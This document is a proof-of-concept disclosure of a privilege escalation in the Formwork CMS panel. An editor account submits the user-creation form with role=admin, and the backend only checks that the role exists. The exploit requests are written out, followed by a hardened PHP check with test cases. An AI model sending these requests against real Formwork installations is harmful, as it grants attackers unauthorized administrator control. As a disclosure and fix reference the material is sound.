Proof of Concept: Privilege Escalation via User Creation
=========================================================

Prerequisites:
- Valid editor account credentials
- Access to the Formwork panel

Step 1: Login as Editor
POST /panel/login
username=editor&password=editor123

Step 2: Access User Creation Form
GET /panel/users/new/

Step 3: Create User with Escalated Privileges
POST /panel/users/new/
form-data:
- fullname: Attacker Admin
- username: attacker
- password: P@ssw0rd123
- email: attacker@evil.com
- language: en
- role: admin  <-- PRIVILEGE ESCALATION HERE

Vulnerable Backend Processing:
1. Editor submits form with role=admin
2. UsersController::create() receives the request
3. $roleId = $form->data()->get('role', 'user')  // Gets 'admin'
4. if (!$this->site->users()->roles()->has($roleId))  // Only checks if 'admin' exists
5. $user->setMultiple($form->data()->toArray())  // Assigns admin role
6. $user->save()  // New admin user created!

Result: Editor successfully created an admin user without having admin privileges.

The vulnerability exists because the code trusts the role parameter from the form
submission without verifying the current user's authorization to assign that
specific role.
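
A server-side check that closes the gap described above, shown next to the existence-only check, as an added example (not Formwork's code or its actual fix). The role ranking, the function names and the array-based user record are hypothetical stand-ins for the panel's own role and permission model.

```php
<?php
declare(strict_types=1);

// Hypothetical role ranking; the real panel's roles and permissions may differ.
const ROLE_RANK = ['user' => 1, 'editor' => 2, 'admin' => 3];

// Mirrors the flawed check described above: the role only has to exist.
function roleAllowedExistenceOnly(string $requestedRole): bool
{
    return array_key_exists($requestedRole, ROLE_RANK);
}

// Hardened check: the role must exist AND must not outrank the session user.
function roleAllowedForActor(string $actorRole, string $requestedRole): bool
{
    if (!array_key_exists($actorRole, ROLE_RANK) || !array_key_exists($requestedRole, ROLE_RANK)) {
        return false; // unknown roles are rejected, never defaulted
    }
    return ROLE_RANK[$requestedRole] <= ROLE_RANK[$actorRole];
}

// $actorRole must come from the server-side session, never from the request body.
function buildNewUser(string $actorRole, array $formData): array
{
    $requestedRole = $formData['role'] ?? 'user';
    if (!is_string($requestedRole) || !roleAllowedForActor($actorRole, $requestedRole)) {
        throw new RuntimeException('Not authorized to assign the requested role');
    }
    // Copy only allow-listed fields instead of mass-assigning the whole form.
    $allowed = ['fullname', 'username', 'password', 'email', 'language'];
    $user = array_intersect_key($formData, array_flip($allowed));
    $user['role'] = $requestedRole; // set explicitly, after authorization
    return $user;
}

// Constructed sample input using the form fields listed in the PoC.
$form = ['fullname' => 'Test User', 'username' => 'test', 'password' => 'x',
         'email' => 'test@example.com', 'language' => 'en', 'role' => 'admin'];

var_dump(roleAllowedExistenceOnly('admin')); // this check never looks at the caller
try {
    buildNewUser('editor', $form);
} catch (RuntimeException $e) {
    echo 'editor -> admin: ', $e->getMessage(), PHP_EOL;
}
echo 'admin -> admin: ', buildNewUser('admin', $form)['role'], PHP_EOL;
echo 'editor -> user: ', buildNewUser('editor', ['role' => 'user'] + $form)['role'], PHP_EOL;
```

Logging each rejected role assignment together with the session user gives detection coverage for attempts like the one in Step 3.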